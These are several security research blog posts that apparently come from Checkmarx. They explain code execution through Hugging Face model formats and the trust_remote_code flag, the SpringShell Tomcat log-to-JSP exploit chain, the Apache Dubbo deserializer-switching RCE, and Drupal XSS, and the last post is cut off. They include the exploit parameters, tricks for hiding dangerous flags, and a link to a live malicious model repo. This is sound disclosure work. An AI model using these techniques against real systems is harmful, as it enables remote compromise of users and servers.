Dor Tumarkin, Author at Checkmarx

“Free Hugs” – What to be Wary of in Hugging Face – Part 2

Dor Tumarkin — Thu, 21 Nov 2024 12:00:48 +0000

Enjoy Threat Modeling? Try Threats in Models!

Previously…
In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, exploiting users who trust ReadMe and provided a glimpse into methods of attacking users via malicious models.
In part 2, we explore dangerous model protocols more in-depth– going into the technical reasons as to why exactly are models running code.

Introduction to Model Serialization

A model is a program that was trained on vast datasets to either recognize or generate content based on statistical conclusions derived from those datasets.
To oversimplify, they’re just data results of statistics. However, do not be misled – models are code, not plain data. This is often stressed in everything ML, particularly in the context of security. Without going into too much detail – it is inherent for many models to require logic and functionality which is custom or specific, rather than just statistical data.
Historically (and unfortunately) that requirement for writable and transmittable logic encouraged ML developers to use complex object serialization as a means of model storage – in this case types of serialization which could pack code. The quickest solution to this problem is the notoriously dangerous pickle, used by PyTorch to store entire Torch objects, or its more contextual and less volatile cousin marshal, used by TensorFlow’s lambda layer to store lambda code.

Please stop using this protocol for things. Please.

While simple serialization involves data (numbers, strings, bytes, structs), more complex serialization can contain objects, functions and even code – and that significantly raises the risk of something malicious lurking inside the models.

Writing’s on the wall there, guys

Protecting these dangerous deserializers while still using them is quite a task. For now, let’s focus on exploitation. This is quite well documented at this point, though there have been some curious downgrades exposed during this research.

Exploiting PyTorch

PyTorch is a popular machine learning library – extremely popular on Hugging Face andthe backbone of many ML frameworks supported on HF. We’ll have more on those (and how to exploit them) in a future blog.
PyTorch relies on pickling to save its output, which can contain an arbitrary method with arbitrary variables invoked upon deserialization with the load function; this works the same for PyTorch:

If this looks identical to the previous Pickle example to you then that’s because it is.

Note that the source code for BadTorch doesn’t need to be in scope – the value of __reduce__ is packed into the pickle, and its contents will execute on any pickle.load action.
To combat this, PyTorch added a weights_only flag. This flag detects anything outside of a very small allowlist as malicious and rejects it, severely limiting if not blocking exploitation. It is used internally by Hugging Face’s transformers, which explains why it can safely load torches even when dangerous and starting version 2.4 This flag is encouraged via a warning where it is stated that in the future this will be a default behavior.

At the time of writing, PyTorch does not yet enable weights_only mode by default. Seeing how the rampant use of torch.load in various technologies is (this will be discussed in part 3), it would be safer to believe this change when we see it, because it is likely to be a breaking change. It would then be up to the maintainers whose code this change breaks to either adapt to this change or disable this security feature.

TensorFlow to Code Execution

TensorFlow, is a different machine learning library that offers various ways to serialize objects as well.
Of particular interest to us are serialized TensorFlow objects in protocols that may contain serialized lambda code. Since lambdas are code, they get executed after being unmarshled from Keras’, being a high-level interface library for TensorFlow.
Newer versions of TensorFlow do not generate files in the older Keras format (TF1, which uses several protobuf files or as h5).
To observe this, we can look at the older TensorFlow to 2.15.0, which allows generating a model that would be loaded using the malicious code (credit to Splinter0 for this particular exploit):

Note that the functionality to serialize lambdas has been removed in later versions of the protocol. For Keras, which supports Lambdas, these are now relying on annotations to link lambdas to your own code, removing arbitrary code from the process.
This could have been a great change if it eliminated support for the old dangerous formats, but it does not – it only removes serialization (which creates the payload) but not execution after deserialization (which consumes it).
Simply put – just see for yourself: if you generate a payload like the above model in an h5 format using the dangerous tensorflow 2.15.0, and then update your tensorflow:

Exploit created on tensorflow 2.15.0, exploit pops like a champ on 2.18.0

In other words – this is still exploitable. It’s not really a Keras vulnerability (in the same vein torch.load “isn’t vulnerable”), though, but rather it’s a matter of how you end up using it – we’ve disclosed it amongst several other things to Hugging Face in August 2024, but more on that in a later write-up.

SafeTensors

Currently, Hugging Face is transferring models from a pickle format to SafeTensors, which use a more secure deserialization protocol that is not as naïve (but not as robust) as pickles.

SafeTensors simply use a completely different language (Rust) and a much simpler serialization protocol (Serde), which requires customization for any sort of automatic behavior post-deserialization.

Moving from Torch to SafeTensors

However, there is a fly in the SafeTensors ointment – importing. It makes sense that the only way to import from another format is to open it using legacy libraries, but it’s also another vulnerable way to invoke Torches. convert.py, a part of the SafeTensors library intended to convert torches to the SafeTensors format. However, the conversion itself is simply a wrapper for torch.load:
https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py#L186
The HF Devs are aware of this and have added a prompt – but that can be bypassed with a -y flag:

Model will run whoami on conversion. Disclaimer: image manipulated to exclude a bunch of passive warnings that might warn you, right after it’s way too late

The problem here is the very low trust barrier to cross – since, as discussed, most configuration is derived from ReadMe commands. This flag can simply be hidden between other values in instructions, which makes convert.py not just a conversion tool but also another vector to look out for.

There are many more conversion scripts in the transformers library that still contain dangerous calls to torch.load and can be found on the Transformers’ Github.

Conclusion

It’s interesting to see how what’s old is new again. Old serialization protocols which are easier to implement and use, are making a comeback through new, complex technology – particularly when security was never a concern during experimentation, and again becoming deeply ingrained in relatively new technology. The price for that speed is still being paid, with the entire ecosystem struggling to pivot to a secure and viable service by slugging through this tech debt.

There are several recommendations to be made when judging models by their format:

With serialization mechanisms baked into the ecosystem, you should avoid the legacy ones, and review those that are middle-of-the-way and historically vulnerable.
Consider a transition to SafeTensor or other protocols that are identified as secure and do not execute code or functions on deserialization and reject older potentially dangerous protocols.
- BUT never trust conversion tools to safely defuse suspicious models (without reviewing them first).
And – as always – make sure you trust the maintainer of the Model.

On The Next Episode…

Now that we’ve discussed a couple of vulnerable protocols, we’ll demonstrate how they can be exploited in practice against Hugging Face integrated libraries.

“Free Hugs” – What To Be Wary of in Hugging Face – Part 1

Dor Tumarkin — Thu, 14 Nov 2024 12:00:00 +0000

Introduction

GenAI has taken the world by storm. To meet the needs for development of LLM/GenAI technology through open-source, various vendors have risen to meet the need to spread this technology.

One well-known platform is Hugging Face – an open-source platform that hosts GenAI models. It is not unlike GitHub in many ways – it’s used for serving content (such as models, datasets and code), version control, issue tracking, discussions and more. It also allows running GenAI-driven apps in online sandboxes. It’s very comprehensive and at this point a mature platform chock full of GenAI content, from text to media.

In this series of blog posts, we will explore the various potential risks present in the Hugging Face ecosystem.

Championing logo design Don’ts (sorry not sorry opinions my own)

Hugging Face Toolbox and Its Risks

Beyond hosting models and associated code, Hugging Face is a also maintainer of multiple libraries for interfacing with all this goodness – libraries for uploading, downloading and executing models to the Hugging Face platform. From a security standpoint – this offers a HUGE attack surface to spread malicious content through. On that vast attack surface a lot has already been said and many things have been tested in the Hugging Face ecosystem, but many legacy vulnerabilities persist, and bad security practices still reign supreme in code and documentation; these can bring an organization to its knees (while being practiced by major vendors!) and known issues are shrugged off because “that’s just the way it is” – while new solutions suffer from their own set of problems..

ReadMe.md? More Like “TrustMe.md”

The crux of all potentially dangerous behavior around marketplaces and repositories is trust – trusting the content’s host, trusting the content’s maintainer and trusting that no one is going to pwn either. This is also why environments that allow obscuring malicious code or ways to execute it are often more precarious for defenders.

While downloading things from Hugging Face is trivial, actually using them is finnicky – in that there is no one global definitive way to do so and trying to do it any other way than the one recommended by the vendor will likely end in failure. Figuring out how to use a model always boils down to RTFM – the ReadMe.

But can ReadMe files be trusted? Like all code, there are good and bad practices – even major vendors fall for that. For example, Apple actively uses dangerous flags when instructing users on loading their models:

trust_remote_code sounds like a very reasonable flag to set to True

There are many ways to dangerously introduce code into the process, simply because users are bound to trust what the ReadMe presents to them. They can load malicious code, load malicious models in a manner that is both dangerous and very obscure.

Configuration-Based Code Execution Vectors

Let’s start by examining the above configurations in its natural habitat.

Transformers is one of the many tools Hugging Face provides users with, and its purpose is to normalize the process of loading models, tokenizers and more with the likes of AutoModel and AutoTokenizer. It wraps around many of the aforementioned technologies and mostly does a good job only utilizing secure calls and flags.

However – all of that security goes out the window once code execution for custom models that load as Python code behind a flag, “trust_remote_code=True”, which allows loading classes for models and tokenizers which require additional code and a custom implementation to run.

While it sounds like a terrible practice that should be rarely used, this flag is commonly set to True. Apple was already mentioned, so here’s a Microsoft example:

why wouldn’t you trust remote code from Microsoft? What are they going to do, force install Window 11 on y- uh oh it’s installing Windows 11

Using these configurations with an unsecure model could lead to unfortunate results.

Code loads dangerous config à config loads code module à code loads OS command

Code will attempt to load an AutoModel from a config with the trust_remote_code flag

Config will then attempt to load a custom class model from “exploit.SomeTokenizer” which will import “exploit” first, and then look for “SomeTokenizer” in that module

SomeTokenizer class doesn’t exist but exploit.py has already been loaded, and executing malicious commands

This works for auto-models and auto-tokenizers, and in transformer pipelines:

in this case the model is valid, but the tokenizer is evil. Even easier to hide behind!

Essentially this paves the way to malicious configurations – ones that seem secure but aren’t. There are plenty of ways to hide a True flag looking like a False flag in plain sight:

False is False

{False} is True – it’s a dict

“False” is True – it’s a str

False < 1 – is True, just squeeze it to the side:

This flag is set as trust_remote_code=False……………………………………………………………………………….………….n’t

While these are general parlor tricks to hide True statements that are absolutely not exclusive to any of the code we’ve discussed – hiding a dangerous flag in plain sight is still rather simple. However, the terrible practice by major vendors to have this flag be popular and expected means such trickery might not even be required – it can just be set to True.

Of course, this entire thing can be hosted on Hugging Face – models are uploaded to repos in profiles. Providing the name of the profile and repo will automatically download and unpack the model, only to load arbitrary code.

import transformers

yit = transformers.AutoTokenizer.from_pretrained(“dortucx/unkindtokenizer”, trust_remote_code=True)  

print(yit)

Go on, try it. You know you want to. What’s the worst that can happen? Probably nothing. Right? Nothing whatsoever.

Dangerous Coding Practices in ReadMes

Copy-pasting from ReadMes isn’t just dangerous because they contain configurations in their code, though – ReadMes contain actual code snippets (or whole scripts) to download and run models.

We will discuss many examples of malicious model loading code in subsequent write-ups but to illustrate the point let’s examine the huggingface_hub library, a Hugging Face client. The hub has various methods for loading models automatically from the online hub, such as “huggingface_hub.from_pretrained_keras”. Google uses it in some of its models:

And if it’s good enough for Google, it’s good enough for everybody!

But this exact method also supports dangerous legacy protocols that can execute arbitrary code. For example, here’s a model that is loaded using the exact same method using the huggingface_hub client and running a whoami command:

A TensorFlow model executing a “whoami” command, as one expects!

Conclusions

The Hugging Face ecosystem, like all marketplaces and open-source providers, suffers from issues of trust, and like many of its peers – has a variety of blindspots, weaknesses and practices the empower attackers to easily obscure malicious activity.

There are plenty of things to be aware of – for example if you see the trust_remote_code flag being set to True – tread carefully. Validate the code referenced by the auto configuration.

Another always-true recommendation is to simply avoid untrusted vendors and models. A model configured incorrectly from a trusted model is only trustworthy until that vendor’s account is compromised, but any model from any untrusted vendor is always highly suspect.

As a broader but more thorough methodology, however, a user who wants to securely rely on Hugging Face as a provider should be aware of many things – hidden evals, unsafe model loading frameworks, hidden importers, fishy configuration and many, many more. It’s why one should read the rest of these write-ups on the matter.

On The Next Episode…

Now that we’ve discussed the very basics of setting up a model – we’ve got exploit deep-dives, we’ve got scanner bypasses, and we’ve also got more exploits. Stay tuned.

SpringShell – Remote Code Execution via Spring Web

Dor Tumarkin — Thu, 31 Mar 2022 12:04:03 +0000

SpringShell is a new vulnerability in Spring, the world’s most popular Java framework, which enables remote code execution (RCE) using ClassLoader access to manipulate attributes and setters. This issue was unfortunately leaked online without responsible disclosure before an official patch was available. This vulnerability has been assigned CVE-2022-22965.

At present, known exploitation of this vulnerability requires a combination of Spring, Java version 9 and up, and Tomcat; however, this is likely to change, due to the fact this exposure occurs in Spring and allows access to various sensitive components. It is therefore safest to assume all Spring Web instances are likely to be vulnerable.

Note that currently there is another critical RCE vulnerability making headlines around Spring Cloud, which involves a similar exploitation technique of accessing functions. This article does not cover that issue.

Technology Breakdown

The current focus at large is on the known exploitation of Spring, Java version 9 and up, and Tomcat.

Spring allows rapid and lightweight development for Java applications, particularly for web applications. Tomcat is a very popular webserver for Java applications, and is also embedded into Spring Boot. This means the combination of Spring and Tomcat is almost ubiquitous, making this vulnerability extremely common. Java 9 has been around for 5 years and is also a requirement for this issue.

Another requirement for the specific exploit is accepting POST requests with POJOs to trigger binding; there are very few Spring web-applications that do not.

Am I Vulnerable?

If you are using Spring Web which is exposed to the internet running on Java 9 and later – you are most likely exposed to this vulnerability. Current exploits available in the wild require a combination of Spring and Tomcat, but Tomcat is merely an instrument in a gadget used to trigger this RCE; more gadgets may be found as exposed by this vulnerability.

How Does It Work?

The best way to explain how this vulnerability is exploitable is by breaking down the available exploit. However – note that while this exploit affects a particular configuration of Spring, Tomcat, and Java – not having this particular configuration does not imply you are safe from exploitation, only from this particular variant.

The current RCE PoC exploit involves the following steps:

Finding a POST endpoint in the Spring application
Submitting a request to reconfigure Tomcat to output a log to an arbitrary JSP file in an accessible location which serves JSP files on the Tomcat server
Triggering a write to this log of user-provided values, to create a JSP file with malicious code
Execute the JSP file by requesting it via HTTP, as per standard JSP behavior

Let’s break it down.

ClassLoader Manipulation

It is possible to access ClassLoader variables via POST parameters prefixed by class.module.classLoader.* in Spring, due to parameter binding. Years ago, Spring allowed access to ClassLoader directly in this manner which led to other exploits (e.g., CVE-2010–1622). This access then made a deny-list for specific parameters as mitigation. However, starting with Java 9 — Modules were added which allowed reaching ClassLoader via class.getModule().getClassLoader(), which is precisely why the deny-list approach to accessing ClassLoader in the past could be bypassed by class.module.classLoader.

This manipulation exposes internal objects to user-provided values, and is the core of this vulnerability.

Tomcat Context Reconfiguration

Using this ClassLoader manipulation on a Tomcat web server, it is possible for attackers to directly access the Tomcat context, which in itself contains Tomcat configurations.

In this exploit, Tomcat is reconfigured to write logs to a new file on an attacker’s behest. This file, instead of just being a log file, will also double as an executable JSP file.

The following attributes are edited to write the arbitrary log file:

class.module.classLoader.resources.context.parent.pipeline.first.directory — the path to which the log file is written. In standard Tomcat dev environments, webapps/ROOT will expose a root folder for the webserver itself; however, in more custom prod environments an attacker may need to figure out where exactly malicious JSP files can be written to be remotely accessible
class.module.classLoader.resources.context.parent.pipeline.first.prefix — will determine the log file name
class.module.classLoader.resources.context.parent.pipeline.first.suffix — will determine the log file extension — for the purpose of exploitation this will be an executable servlet type such as JSP, but attackers can come up with various other potentially executable file types
class.module.classLoader.resources.context.parent.pipeline.first.pattern — this is the pattern that will be written to the log file; attackers will write malicious code instead of a pattern, such that on a logging event their malicious code will be written into the file
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat — this is the date format, which is purposefully left blank to remove the noisy timestamps from the output of the exploit

Arbitrary File Write of a Malicious JSP File

For example, the following POST request can be sent:

This will override the log configurations to create a JSP servlet at the Tomcat’s web application root (“/”), allowing attackers to execute the malicious code in “pattern” by simply browsing to /ohno.jsp

Mitigation & Conclusions

According to an update on the official Spring website, this issue is mitigated in Spring Framework versions 5.3.18 and 5.2.20. This article also contains a vendor-recommended workaround for those who cannot update at present.

From the looks of things and how analysis of this issue currently pans out — this vulnerability illustrates how the changes made to Java have incidentally made the Spring deny-list obsolete, in a way that has evaded detection for a significant amount of time. This highlights the ever-present issue of denying dangerous functionalities, rather than explicitly allowing safe ones, which is a behavior often prevalent in frameworks that offer a lot of dynamic and complex features.

Checkmarx SCA customers can scan their code for similar types of vulnerabilities and get the latest remediation guidance.

The 0xDABB of Doom: CVE-2021-25641

Dor Tumarkin — Fri, 04 Jun 2021 14:01:09 +0000

Introduction

When I previously wrote the original Dubbo publication, we disclosed that issue as it was mitigated by the vendor. While the Dubbo “HTTP” protocol in that disclosure was trivially vulnerable to the most common Java deserialization attacks (as evidenced by the immediate cropping up of exploits for Dubbo as soon as a very broad description of the issue was published in a mailing list) – the so-called “HTTP” was an elective protocol, and honestly – there was no apparent reason to choose it over the default Dubbo protocol. This made it an unlikely misconfiguration, and most devs would probably just stick to the default Dubbo protocol; this made it very tempting to investigate Dubbo further.
The “Dubbo” protocol is a proprietary binary protocol which required some reverse-engineering of its inner logic and how it is being consumed by the endpoint. It actually wraps around the binary of the serialized object, adding meta-data and additional objects to the stream. The underlying deserializer defaults to Hessian2, configured to exclude many of the “known dangerous” classes often used to exploit such attacks. However, there were some ways to manipulate this protocol, such as elect the deserializer, which would then lead to RCE.

Vulnerability Overview

The Dubbo protocol is a proprietary protocol developed for Apache Dubbo for transmission of objects between Dubbo services. Apache Dubbo providers and consumers using certain versions of Dubbo, when configured to accept the default “Dubbo” protocol, allows a remote attacker to send a malformed stream containing a malicious object to the exposed service which would result in Remote Code Execution.

This RCE occurs with no authentication, and no knowledge on an attacker’s part is required to exploit this vulnerability – only an open port on a Provider server running Apache Dubbo. This issue applies to default configuration, where the built-in Dubbo protocol is used.

Severity

Checkmarx considers this vulnerability to have a CVS Score of 10.0 (Critical), as it is an unauthenticated remote code execution vulnerability which provides privileges at the Dubbo service’s permission level, allowing complete compromise of that service’s confidentiality, integrity, and accessibility.
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

What’s Going On – Understanding the Dubbo Protocol

The server-side “Dubbo” protocol on a provider is used to expose a service, and methods within this service, to external consumers.
The “Dubbo” protocol has two general modes served over the same port:

Telnet-like mode, where a CLI is available to allow invoking a method exposed by the provider service
An RMI mode, where the TCP packet is then treated as a byte stream, which is deserialized to be used with the service offered by the Dubbo provider

Fig. 1 – Dubbo Telnet

While default behavior is Telnet-like, the way the remoting protocol is invoked is by providing a header which is built in the following manner:

Two magic bytes – 0xdabb
A flag byte – this flag determines:
1. If this stream is a request or a response
2. If this transaction is one-way or two-way
3. Deserialization mechanism identifier (Hessian2, Kryo, Java etc.)
Padding null-bytes, to allow for dynamic length
Length of stream

This method is reminiscent of port-knocking, but instead of sending a stream of bytes to open a port, two preamble bytes are used to switch between protocols (Telnet-like mode and RMI-like mode).
The preamble header is then followed a stream sequence containing the following data:

Dubbo Protocol version
Service name (“Path”)
Service version
Method name
Method argument types
Method arguments
Request attachments, which may contain additional data

All of the above data is read as a UTF string with the exception of 6 – method arguments; this is because a method argument may contain any Java object which may be passed to the Dubbo Provider, while other data is provided as Strings, to be used with reflections inside the code.
The open Dubbo port can be trivially fingerprinted as such by readily available tools, such as Nmap.

Fig. 2 – Dubbo telnetd Service, As It Appears on Nmap

The raw TCP request, including preamble and metadata, sends a request and receives a response over the same TCP stream, as demonstrated via Dubbo’s Quick Start sayHello demo:

Fig. 3 – Dubbo Protocol Request in Its Default Serialized Form

Fig. 4 – Dubbo Protocol Response in Dubbo Demo

Fig. 5 – Dubbo Protocol Breakdown

Attacking the Dubbo Protocol

The most commonly known Java-based gadget chains used for exploiting deserialization attacks rely on several key classes – these classes appear to be blacklisted on the default Hessian2 serializer.
The Dubbo protocol relies on the flags byte (3^rd byte of the stream) to determine which serializerdeserializer to use when processing this stream. While the default is Hessian 2, and attacker may tamper with this flag to choose a different deserializer, exposing multiple additional options for serialization. These additional deserializers do not offer the same protection Hessian 2 does.
An attacker can modify the flag to choose either of the following protocols:

Both of these protocols are binary serialization protocols, and successfully deserialize the FastJSON gadget-chain.

Fig. 6 – The Majestic, Feral Beauty of a Kryo-Serialized FastJSON Gadget ByteStream

For the purpose of having the gadget chain deserialized, however, a compliant stream should be created containing the required preamble, headers, and metadata.
Since the exploit does not actually require Dubbo to successfully dispatch the request (in versions <= 2.7.5), but rather simply successfully read, parse and deserialize it, the stream itself can contain random or arbitrary strings. These strings are only there to serve as padding and satisfy multiple “readUTF” operations, until readObject is called on the stream, at which point FST or Kryo are the chosen deserializer and the exploit is triggered.

Recreating the Issue

An attacker can reimplement the Dubbo protocol with its byte preamble, header flags and content length, as well as dummy strings and a malicious object to satisfy the endpoint’s implementation for reading it.
The same gadget chain used in the previous exploit for 2.7.3 HTTP protocol, which allows remote OS command execution was found in the scope of vanilla Apache Dubbo, so long as dubbo-common is also in scope (more on this later).

Proof-of-Concept

Recreating a Victim Dubbo Instance for PoC

Either use the code sample from my previous research blog or follow this guide:

Follow the Official Apache Dubbo Quick-Start guide until a functioning provider and registry are successfully created (see here for a full sample)
Ensure dubbo-common, or a package where this dependency is not optional, are in scope

Add the following dependencies to enable Spring Framework, Dubbo and Dubbo Common (presented in Maven pom.xml form for ease of use):

Triggering Vulnerability PoC

See this link for functioning POC code. The gadget chain being exploited here, which is native to Dubbo 2.7.3’s ecosystem, is clearly broken down in Part 1. The rest of this POC takes this gadget, and reimplements the Dubbo protocol to wrap it with the appropriate preamble, flags, and headers to exploit a vulnerable deserializer on a receiving Dubbo endpoint.

Fig. 7 – Deserialization Gadget Writes “whoops!” to Java Console, and Starts Calc.exe

Vulnerability Evolution

Between the disclosure of this issue and the CVE, this issue has evolved across several releases. For versions 2.7.5 and 2.7.6 – the vulnerable deserializers have been removed from the core packages into their own respective packages. This functionality is imported separately, in the form of the dubbo-serialization-kryo/fst packages. In 2.7.7, according to documentation, it is no longer possible to pass garbage values in the Dubbo stream – deserialization does not occur without a proper method and service name.

Conclusions

This exploit, following the previous PoC for exploiting the HTTP protocol in version 2.7.3, further illustrates the need for strict whitelisting combined with class resolution look-ahead within any remote invocation services that deal with serialized objects – not just for Dubbo, and not just for Java.
While this issue is glaring for Dubbo 2.7.3 and under, because of the gadget chain relying on an outdated FastJSON discovered and disclosed in the previous research, this only scratches the surface of this attack – other gadget chains may still exist within Dubbo’s internals, and most Dubbo instances will rely on other dependencies beyond those bundled with this software, allowing for a more diverse dependency ecosystem and allowing similar forms of exploitation to persist until a robust whitelist solution is used within Dubbo’s internals.
At present, it is safe to assume many (and probably most) instances of Dubbo <= 2.7.3 are vulnerable to remote code execution via deserialization of untrusted data, while any Dubbo version under 2.7.8 has some form of unsafe deserialization going on in the Dubbo Protocol pipeline, 2.7.9 has added a configuration flag to prevent “chosen deserializer” attacks such as this. Whether it is vulnerable is dependent on gadget availability – which is always a likely possibility.

Recommendations

Upgrade from Alibaba Dubbo to Apache Dubbo; Alibaba Dubbo does not appear to be officially maintained any longer
Update Apache Dubbo to its latest version
Ensure to never import unnecessary Dubbo packages, e.g. dubbo-serialization-kryo where Kryo is not actively used, to reduce attack surface against the RMI interface

Disclosure Timeline

2/5/20 – Disclosure of Dubbo RCE Deserialization Exploit
2/19/20 – Reminder #1 to Apache Security Team
4/6/20 – Reminder #2 to Apache Security Team
7/27/20 – Reminder #3 to Apache Security Team
1/22/21 – First Acknowledgement of Issue
2/26/21 – Fix Released
6/4/21 – Public Disclosure

Apache Package Versions

Deserialization RCE with FastJSON Gadget:
Vulnerable package: org.apache.dubbo.dubbo <= 2.7.3
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: org.apache.dubbo.dubbo <=2.7.6 – implementation dependent
Requirements:
org.apache.dubbo.dubbo-common <= 2.7.9
dubbo-serialization-kryo AND/OR dubbo-serialization-fst – <=2.7.9

Alibaba Package Versions

Despite certain signs of life, this is no longer officially maintained – all Alibaba Dubbo resources now point to Apache Dubbo.
Deserialization RCE with FastJSON Gadget:
Vulnerable package: com.alibaba.dubbo <= 2.6.7
Requirements:
Com.alibaba.dubbo-serialization-kryo OR Com.alibaba.dubbo-serialization-fst <= 2.6.7
org.springframework.spring-web – 5.3.4
Deserialization vulnerability without FastJSON Gadget, requires additional deserialization gadget in scope:
Vulnerable package: com.alibaba.dubbo <= 2.6.9
Requirements:
Com.alibaba.dubbo-serialization-kryo OR Com.alibaba.dubbo-serialization-fst <= 2.6.9
org.springframework.spring-web – 5.3.4

Final Words

Disclosures like this are part of the Checkmarx Security Research Team’s efforts to drive changes in software security practices. Checkmarx is committed to analyzing open source packages to help development teams build and deploy more secure software.

Drupal Core: Behind the Vulnerability

Dor Tumarkin — Wed, 02 Dec 2020 08:12:36 +0000

As you may recall, back in June, Checkmarx disclosed multiple cross-site scripting (XSS) vulnerabilities impacting Drupal Core, listed as CVE-2020-13663, followed by a more technical breakdown of the findings in late November. Today, we’re releasing details surrounding additional, new vulnerabilities (CVE-2020-13669) uncovered in Drupal Core as part of our continued research of the open source CMS platform. All research was conducted and reported to Drupal by Dor Tumarkin of Checkmarx.

CVE-2020-13669 – Overview

Drupal Security Risk: Moderately Critical – https://www.drupal.org/sa-core-2020-010
Vulnerable versions:

Drupal 8.8 – before 8.8.10
Drupal 8.9 – before 8.9.6
Drupal 9 – before 9.0.6

Impact Summary

Inject malicious code in webpages via Cross-Site Scripting to:
- Hijack user accounts
- Inject malicious web-content, such as malicious login or payment forms
Defacing a page to hide its contents
Redirect users to a website of an attacker’s choice, allowing them to abuse users’ trust in the victim website

CVE-2020-13669 – FigCaption Widget – Self-XSS, Stored DOM Manipulation, and XSS Potential

Vulnerability Proof of Concept (PoC)

The Figure Caption Widget (“FigCaption”) allows even basic content contributors with Basic HTML content privileges to insert a caption into their content. It is bundled with Drupal Core’s default CKEditor.
The raw HTML of such a caption would be of the following form:

Once submitted or rendered, this HTML is morphed into an entire HTML tree that presents the image inside CKEditor. However, the “data-caption” attribute may itself contain HTML, which is then rendered, and suffers from multiple issues as follows:

A lack of coherence/consistency between HTML attribute whitelists for the general CKEditor and internal FigCaption HTML, which allows the HTML inside FigCaption to contain arbitrary attributes, allowing:
- Injecting arbitrary attributes and classes into HTML tags, such that classes with CSS that covers the entire app, defacing pages permanently with a redirection to a site of an attacker’s choosing (it should be noted that “on*” event attributes, such as “onclick”, are still properly sanitized)

A lack of sanitization when rendering in preview mode, allowing injecting